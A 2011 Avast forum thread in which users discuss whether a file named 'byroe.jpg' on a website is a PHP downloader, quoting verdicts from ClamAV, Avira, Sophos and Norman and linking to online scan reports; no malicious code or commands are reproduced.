Avast WEBforum
Other => Viruses and worms => Topic started by: polonus on August 10, 2011, 06:39:49 PM
-
See: http://www.virustotal.com/url-scan/report.html?id=d9f0ee71954863bb7354906ebfce4b37-1312985843
and accompanying scan: http://www.virustotal.com/file-scan/report.html?id=ac50e4038d7ef80770860138896415178a156eca38e31d725a598fa8b1f611ce-1312993064
Also consider this: http://anubis.iseclab.org/?action=result&task_id=1fd2bde677aeabbb439a866659e5952b9&format=html
Only flag is from Clamav
WARNING! FILE MAY BE INFECTED!
Clamav
byroe.jpg: PHP.Downloader FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.005 sec (0 m 0 s)
Is this real or a false positive (see attached gif image)
Here the site is given clean: http://www.urlvoid.com/scan/bichoquerido.com
Here also sucuri:
status: Verified Clean
web trust: Not Blacklisted
polonus
-
My forum friends,
As this probably should be detected as "PHP:Multicom-B" by avast's webshield, as is my guess, it is not, but what happens is that I am stopped from going there by BitDefender TrafficLight extension in my Google Chrome browser.
Here it was not being detected: http://wepawet.cs.ucsb.edu/view.php?hash=224171abb521a8bad1b8084974fc6c78&t=1313005017&type=js
But is in this database as RFI attack site: -http://www.bizimbal.com/odb/details.html?id=976939
polonus
-
This is what Avira say
The file 'byroe.jpg' has been determined to be 'MALWARE'.Our analysts named the threat PHP/Dldr.Zit.J.The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
and SOPHOS
The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly.
Norman
Its been cleared that the file is malicious and has a behavior of a downloading a bot file and executes it.
byroe.jpg : Processed - PHP/Dloader.AE